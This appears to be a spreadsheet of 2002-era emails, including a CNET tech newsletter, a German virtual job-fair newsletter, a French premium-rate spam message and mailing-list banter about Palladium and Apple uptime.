 		&lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;
 &lt;tr&gt;&lt;td&gt;
 			&lt;font face="Arial, Helvetica"&gt;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href="http://clickthru.online.com/Click?q=f8-57BSQfscKTcRFQIpiaRL6DCwoliR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/0622022ghz1.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr1Rb1TCo6Nv0T0QkY6b7PR" &gt;&lt;b&gt;2GHz to go&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;Check out the first 2GHz portable powerhouses from Dell and WinBook that push the performance envelope.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrd3QQ9RyUVuo4I9yc99NcnR" &gt;IBM thin-and-light ThinkPads fit to a T
 &lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzTGPNTWRwQ93KjZ6eJcneR" &gt;HP xe4500: the last of the Omnibooks&lt;/a&gt;&lt;br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&lt;b&gt;Notebooks&lt;/b&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	1. &lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpziJtLDdnAu7hgvo2AKesR" &gt;Gateway 600XL&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoL8tQUtYFj4JYndFK-AWlFR" &gt;Dell Inspiron 2600 series
 &lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBWAWldqTP1okYP2r70U69R" &gt;Dell Inspiron 8200 series&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0Vlo5uiYmEYIEElDh4B1rR" &gt;Toshiba Satellite 2400-S251&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQB7cNNVOGlUByjw2PB1s7iR" &gt;Toshiba Satellite 5105-S607&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b6-llkUQCKVBmP2rcjT_PUCch20Lg4R" &gt;See all most popular notebooks&lt;/a&gt;&lt;/b&gt;&lt;br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 software --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_soft.gif" alt="Software" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsQXvzTJqqyXYHRf_uaHkrR" &gt;PIMs on the side&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;/font&gt;
 &lt;font size="-1"&gt;Whatever happened to the straightforward, dedicated PIM?
    PIM/contact managers, such as the ubiquitous Outlook and
    Lotus, pushed them to the sidelines. But a few PIMs survived
    this enforced obscurity. If you need a plain PIM that doesn't
    cost a fortune, one of these may tickle your fancy.
 &lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDxnLmGawmkPhB7mxUT9AiR" &gt;More software&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /software --&gt;
 &lt;p&gt;
 &lt;!-- hardware --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_hard.gif" alt="Hardware" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f5-lTbRQgwH2ECsfuz6DmLwgkaZmRPR" &gt;Apple eMac not just for education anymore&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Ideally suited to students living in small spaces and home
    users with basic needs, the eMac is an attractive, adequately
    speedy, and easy-to-use PC without the flat-panel iMac's
    relatively high price. Wondering whether to go CRT or
    flat-panel? Read our review.
 &lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrwX4iQTlhBwhq6GOxuYznR" &gt;More desktops&lt;/a&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58sviEYt-V1xmYgHobjqmeR" &gt;Read the review&lt;/a&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
    &lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcdj2dG48hN3_tvVyn4IcgyR" &gt;Check latest prices&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /hardware --&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;!-- electronics --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_ele.gif" alt="Electronics" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpGf4f1KzKVX4RVXFO5JSFR" &gt;MiniDV maestro&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Sony's DCR-VX2000 gives prosumers a versatile tool for
    capturing high-quality digital video. With three CCDs, smooth
    performance, and excellent low-light capability, this
    camcorder meets the demands of avid videographers where lesser
    cameras fail.
 &lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0i96dWzPihsnStcVTQzc9R" &gt;More in digital photo&lt;/a&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZG-VJ6EyaRYG8Y0gSPZxsR" &gt;Read the review&lt;/a&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
    &lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J2r6NWVqikUMBXB6W5WWlR" &gt;Check latest prices&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /electronics --&gt;
 &lt;p&gt;
 &lt;!-- wireless --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_wi.gif" alt="Wireless" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMrKK9lE7bHSCN0U7nQUD4R" &gt;Cordless phones: the other wireless devices&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;/font&gt;
 &lt;font size="-1"&gt;In the market for a new cordless phone but don't know whether
    to buy a 900MHz or 2.4GHz model or which manufacturers offer
    the best products? No sweat: check out our new line coverage to
    find the phone that fits your personal style and needs.
 &lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKF7r0ECyPAE64qDAwrPGrR" &gt;More in wireless phones&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /wireless --&gt;
 &lt;p&gt;
 &lt;br clear=left&gt;
 &lt;a name="buzz"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 &lt;tr valign=bottom&gt;&lt;td width=70 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/dp/BUZZMETER.gif" width=90 height=15 alt="Buzz Meter"&gt;&lt;/td&gt;
 &lt;td width=339&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt;&amp;nbsp;Readers mourn Gene Kan&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=14&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=2 bgcolor="#CC9999"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;font face="arial, helvetica" size="-1"&gt;
 Peer-to-peer pioneer dies, Macworld kicks off in Manhattan, and
 the PayPal/eBay merger is not going so well.&lt;/font&gt;
 &lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;i&gt;--Laura Lindhe, executive editor, CNET Tech Trends&lt;/i&gt;&lt;/font&gt;
 &lt;p&gt; 
 &lt;table width="100%" cellpadding=4 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;1&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgDZBmo4WSjg0SxiPZvH6lR" &gt;Gene Kan&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
    Gnutella open-source guru Gene Kan, who died on June
    29 in an apparent suicide, was clearly beloved by the CNET
    community. Last week, search requests for information on
    25-year-old Kan far outweighed the kind of requests on
    products and companies I usually see. A pioneer in the
    peer-to-peer space, many credit him with legitimizing file
    sharing--making it about more than music, according to Wired
    News.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;2&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMW4gxMQtE6tTbDS-BJjho4R" &gt;Macworld&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
    The annual Apple lovefest in New York is always a
    good show, whether or not Steve Jobs has anything real to
    announce. So far, it looks like Apple has already surprised a
    few by announcing the release of QuickTime 6.0 (see No. 7),
    which many thought would get bogged down in a licensing
    quagmire.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;3&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOs8dGmMSxCs3CyJqsjeorR" &gt;PayPal&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
    It's been a rocky road thus far for the eBay and
    PayPal deal. Soon after eBay announced it was buying PayPal
    for $1.5 billion, shareholders filed a lawsuit claiming that
    PayPal's price tag was too low. This week, PayPal is being
    subpoenaed by the New York attorney general in regard to its
    involvement with online gambling transactions.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;4&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjTZPsvKmHg3F-erCpGY9iR" &gt;Wi-Fi&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
    I'm just going to leave this common term for 802.11 up
    on the Buzz Meter permanently. This time, Wi-Fi is getting
    interest because of a possible pact between tech heavyweights,
    including Intel, AT&amp;amp;T Wireless, and Verizon Communications, to
    build wireless access places across the nation in public areas
    where people would want to launch onto the Net, such as
    airports.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;5&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQTqzGejK3Rl28NRQSnqQPR" &gt;eMac&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
    This is the for-education-only computer that consumers
    wanted so badly that Apple released it to them. The CNET
    review is out, and here's the word: the eMac is what the iMac
    used to be. Basically, it's an easy-to-use, fairly inexpensive
    computer for users who don't need to do much besides word
    processing and accessing the Web.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td colspan="2" align="left"&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 For more Buzz, &lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQi8Bx4v9qDFWVhZSgRXBnR" &gt;click here&lt;/a&gt;.
 &lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt; 
 &lt;/td&gt;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is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=48-ggsbzRBpVdwCyNf7__1Q1FD9nc3p49RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage my subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0w8sJtgMBobvZm5yGKIaZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUenorNRgfrqMtNXjoCKqdR"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href="http://clickthru.online.com/Click?q=87-izDOQ8n4W17INUleplrQ8kasp4eR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanVDfco_EYlXdIl9Oi-UiyR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0MIp9rWSUr9i_f_B0NLnlR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLJOc4lhgmWdT_pfmeDx04R" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEJi8NOw3gvpmtTwxp6DtrR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWgaJyD07Zr2fqfAgMcXeaiR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e404-02&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=06-fPCunn83hKf4T0DD4-QtRz1ub9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Virtueller Messetag der jobfair24 am Mittwoch, 03. Juli 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo Xxxxxxxxx Yyyyyyy,
 diesen Monat im Newsletter: heisse Karrieregespraeche in kurzen Hosen und
 wie Sie mit der Profi-Stellensuche schneller ans Ziel kommen!
 Viel Erfolg bei der Jobsuche wuenscht Ihnen das
 jobfair24-Team
 --
 Inhalt:
 ---
 1. Die erste virtuelle MBA-Messe
 2. Virtueller Messetag am Mittwoch, 03. Juli 2002
 3. Wir stellen vor: Unternehmen auf der jobfair24
 4. Profi-Stellensuche
 ---
 1. Die erste virtuelle MBA-Messe
 ---
 Am Donnerstag, 20. Juni hat sie eroeffnet, die erste virtuelle MBA-Messe im
 Internet. Unter www.jobfair24.de/virtualworldmbatour koennen Sie sich bei
 rund 40 der Top 100 Business Schools weltweit ueber Studiengaenge,
 Schwerpunktthemen, Studiengebuehren, Stipendien, und vieles mehr
 informieren. Noch bis zum 04. Juli 2002 sind die 3D-Messehallen fuer Sie
 geoeffnet - rund um die Uhr.
 Zum virtuellen Messetag am Donnerstag, 27. Juli stehen Ihnen dann zwischen
 13 und 19 Uhr die Vertreter der Business Schools in Chat Gespraechen zur
 Verfuegung. Wer moechte, kann sich bereits im Vorfeld online fuer
 Chat-Termine bei den einzelnen Instituten bewerben.
 Unter anderem vertreten sind: Columbia Business School (USA), London School
 of Economics (Grossbritannien),  HEC MBA Program (Frankreich), SDA Bocconi
 (Italien), Instituto de Empresa (Spanien), HEC Montreal (Kanada),
 University of Westminster (Grossbritannien), ...
 Zur VirtualWorldMBATour gehts hier:
 http://www.jobfair24.de/virtualworldmbatour/start/
 ---
 2. Virtueller Messetag am Mittwoch, 03. Juli 2002
 ---
 Drueckende Hitze draussen und im Buero stehende Luft? Gehen Sie doch einen
 Mittwoch nachmittag eher nach Hause und geniessen Sie den Besuch einer
 Rekrutierungsmesse - ohne Anzug und ohne Anreise!
 Mit einem kuehlen Getraenk in der Hand, in Shorts und T-Sirt koennen Sie
 vom eigenen Sofa aus die virtuelle 3D-Job-Messe besuchen und
 Karrieregespraeche mit den Personalverantwortlichen zahlreicher
 international taetiger Unternehmen fuehren.
 Am Mittwoch, 03. Juli 2002 zwischen 13 und 18 Uhr ist es wieder so weit -
 also am Besten schon mal die Getraenke kalt stellen ;-)
 Login: http://www.jobfair24.de/cgi-bin/bewerber/login.cgi
 ---
 3. Wir stellen vor: Unternehmen auf der jobfair24
 --
 Deutsche Krankenversicherung AG - Mit ueber 2,9 mio Versicherten ist die
 DKV Europas fuehrender Spezialist fuer die private Krankenversicherung.
 2002 wird weiter expandiert und dafuer werden bundesweit
 Hochschulabsolventen mit wirtschafts- oder rechtswissenschaftlichem Studium
 gesucht. Weitere Infos rund um die DKV stehen im Firmenprofil:
 http://www.jobfair24.de/firmen/dkv/profil/dkv.html
 SCA Hygiene Products - Das internationale Unternehmen mit Hauptsitz
 Muenchen-Flughafen ist im Bereich Hygiene Producs taetig. Fuer 2002 werden
 vor allem Mitarbeiter aus den Bereichen Ingenieurwesen (z.B. Papier,
 Verfahrenstechnik, Maschinenbau) aber auch BWL und Informatik gesucht.
 Viele weitere Informationen gibts im Firmenprofil:
 http://www.jobfair24.de/firmen/sca/profil/sca.html
 Firmenprofile der anderen ausstellenden Unternehmen finden Sie hier:
 http://www.jobfair24.de/cgi-bin/stellensuche/firmaprofil.cgi
 --
 4. Profi-Stellensuche
 ---
 Heute suchen, im Herbst arbeiten? Klingt gut!
 Ein Besuch auf der virtuellen 3D-Job-Messe ist dabei der richtige Weg zum
 Traumjob. Um sich ideal auf die Chat-Gespraeche vorzubereiten, sollten Sie
 nicht nur Ihre digitale Bewerbungsmappe bereits ausgefuellt haben. 
 Auch ein Blick in die Profi-Stellensuche kann sehr hilfreich sein!
 Hier koennen Sie nach Berufsfeldern, nach der Art der Einstellung, nach
 Laendern,... suchen und dann am Messetag ganz gezielt auf die
 Personalmanager zugehen. Das spart Zeit und Nerven.
 Mal ausprobieren? Einfach hier klicken:
 http://www.jobfair24.de/cgi-bin/stellensuche/stellen_suche.cgi?SEARCH=1
 --------------
 Infos zum Newsletter:
 -------
 Dieser Newsletter wurde versendet an: Xxxxxxxxx.Yyyyyyy@web.de 
 Falls Sie Fragen haben, Hilfe benoetigen bzw. Anregungen oder Kritik
 aeussern wollen (oder vielleicht ein kleines Lob :-)), wenden Sie sich
 bitte an: newsletter@jobfair24.de Wenn Sie den Newsletter wieder
 abbestellen wollen, klicken Sie hier:
 http://www.jobfair24.de/cgi-bin/newsletter/unsubscribe.cgi
 Falls Sie diesen Newsletter durch einen Freund erhalten haben und ihn gerne
 abonnieren wuerden:
 http://www.jobfair24.de/cgi-bin/newsletter/newsletter.cgi 
 Es kann leider hin und wieder passieren, dass durch fehlerhafte
 Eintragungen von E-Mail Adressen Mails falsch zugestellt werden. Dies ist
 natuerlich unbeabsichtigt... Um sich aus der Liste zu loeschen einfach hier
 klicken: http://www.jobfair24.de/cgi-bin/newsletter/unsubscribe.cgi oder
 besuchen Sie uns doch einmal auf unserer Homepage
 http://www.jobfair24.de/start.html und lassen Sie sich vom Flair der
 weltweit ersten virtuellen 3D-Job-Messe begeistern!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Quelqu'un t'aime en secret
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_84815C5ABAF209EF376268C8
 Content-type: text/plain; charset="iso-8859-1"
 ------=_NextPart_84815C5ABAF209EF376268C8
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Message&lt;/TITLE&gt;
 &lt;META content=3D"text/html; charset=3Dwindows-1258" http-equiv=3DContent-T=
 ype&gt;
 &lt;META content=3D"MSHTML 5=2E00=2E3315=2E2870" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;P&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;BR&gt;
   &lt;/font&gt;
 &lt;BLOCKQUOTE dir=3Dltr style=3D"MARGIN-RIGHT: 0px"&gt;=20
   &lt;DIV&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;IMG=20
   src=3D"http://ad=2Efr=2Edoubleclick=2Enet/ad/N2347=2Eemails=2Efrance=2Ec=
 apmg/B1013634=2E6;sz=3D66x50;ord=3D[timestamp]?"&gt;&lt;/font&gt;&lt;/DIV&gt;
   &lt;DIV&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&amp;nbsp;&lt;/font&gt;&lt;/DIV&gt;
   &lt;DIV&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;FONT size=3D2&gt;&lt;STRONG&gt;=
 Quelqu'un=20
     t'aime en secret&lt;/STRONG&gt;&lt;BR&gt;
     et nous a charg=E9 de te pr&lt;SPAN=20
   class=3D718481609-15052002&gt;=E9&lt;/SPAN&gt;venir,&lt;/FONT&gt;&lt;/font&gt;&lt;/DIV&gt;
   &lt;font color=3D"#0000ee" face=3D"Arial, Helvetica, sans-serif"&gt;&lt;FONT size=
 =3D2&gt;&lt;STRONG&gt;&lt;EM&gt;devine=20
   qui a flash=E9 sur toi&lt;BR&gt;
   en appelant le&lt;/EM&gt;&lt;/STRONG&gt;&lt;FONT=20
   color=3D#000000&gt;&lt;STRONG&gt;&lt;EM&gt;&amp;nbsp;&lt;SPAN class=3D671395214-14052002&gt; &lt;/SP=
 AN&gt;&lt;/EM&gt;&lt;/STRONG&gt;&lt;SPAN class=3D718481609-15052002&gt;&lt;FONT=20
   size=3D2&gt;&lt;EM&gt;&lt;STRONG&gt;08 99 701 123&lt;/STRONG&gt;&lt;/EM&gt;&lt;/FONT&gt;&lt;FONT=20
   size=3D1&gt;*&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/font&gt;=20
   &lt;P&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&amp;nbsp;&lt;/font&gt;&lt;/P&gt;
   &lt;P&gt;&lt;font color=3D"#0000ee" face=3D"Arial, Helvetica, sans-serif"&gt;&lt;FONT c=
 olor=3D#000000 size=3D1&gt;&lt;SPAN=20
   class=3D718481609-15052002&gt;___________________________________&lt;BR&gt;
     &lt;FONT=20
   size=3D-5&gt;*1=2E12 =80/min&lt;br&gt;
     &lt;br&gt;
     &lt;br&gt;
     &lt;/FONT&gt;&lt;font color=3D"#0000ee" face=3D"Arial, Helvetica, sans-serif"&gt;&lt;=
 font color=3D#000000 size=3D1&gt;&lt;span=20
   class=3D718481609-15052002&gt;&lt;font color=3D"#0000ee" face=3D"Arial, Helvet=
 ica, sans-serif"&gt;&lt;font color=3D#000000 size=3D1&gt;&lt;span=20
   class=3D718481609-15052002&gt;&lt;font=20
   size=3D-5&gt;&lt;img src=3D"http://www=2Eimp20=2Ecom/hamedia/hamediafr290502=2E=
 gif"&gt;Pour=20
     ne plus recevoir de message, r&amp;eacute;pondez avec l'objet &amp;quot;STOP&amp;q=
 uot;=2E&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;font=20
   size=3D-5&gt; &lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;FONT=20
   size=3D-5&gt; &lt;/FONT&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/font&gt;&lt;/P&gt;
 &lt;/BLOCKQUOTE&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_84815C5ABAF209EF376268C8--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Palladiated? (was re: wow - palladiated! (Re: Palladium: technical limits and implications))
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; On Wed, Aug 07, 2002 at 03:08:08PM -0400, R. A. Hettinga wrote:
 &gt; &gt; At 6:54 PM +0100 on 8/7/02, Adam Back wrote:
 &gt; &gt; &gt; Palladiumized
 &gt; &gt;
 &gt; &gt; Palladiated?
 &gt; &gt;
 And the antonym? Odyssielded. Rhymes with shielded.
 http://homepage.mac.com/cparada/GML/Odysseus.html
 Odysseus was the first to learned the Palladium Oracles from the Seer Hellenus.
 Odysseus neutralised (neutronised?) Palladium's defence for Troy.
 Odysseus invented the first Trojan Horse.
 Incidentally public revelation of the Palladium is supposed to be on
 Seventh Day to the Ides of Jun, i.e. 8th. June. The Newsweek article was
 a bit late.
 http://www.clubs.psu.edu/aegsa/rome/jun06.htm
 David Chia
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 8 Aug 2002, Adam L. Beberg wrote:
 --]Yea, Apple sucks, my crappy iMac hasn't crashed once in 2 years.
 When all you do on it is pout on emaillists and watch asain bukaky porn
 wheres the strain?
 Striken as anecdotal...oh and I had a win98 box running wsmf server stuffs
 (apache, dbs, shoutcast etc) up on dsl without so much as a hicup for over 1.5 years
 other than the various game realted hijinks tribes would pull. So if its
 raw uptime ou want,....tools and craftsman time. Thus once again uptime
 fawl down go boom.
 -tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ink Prices Got You Down?               SY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</si>
  <si>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&lt;title&gt;Do you Have an Inkjet or Laser Printer?&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"2" width=3D"420" height=3D"55" bordercolor=3D"#FFFFFF" =
 bordercolorlight=3D"#FFFF00" bordercolordark=3D"#000080" bgcolor=3D"#00000=
 0"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"49" align=3D"center" bgcolor=3D"#000000=
 " bordercolor=3D"#C0C0C0" style=3D"border-right-style: solid; border-right=
 -color: #C0C0C0"&gt;&amp;nbsp;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"1" width=3D"99%" height=3D"11" bordercolor=3D"#=
 000000"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"5" align=3D"center" bgcolor=3D"=
 #FFFF00" style=3D"color: #FFFFFF; font-size: 10pt; font-weight: bold"&gt;&lt;b&gt;&lt;=
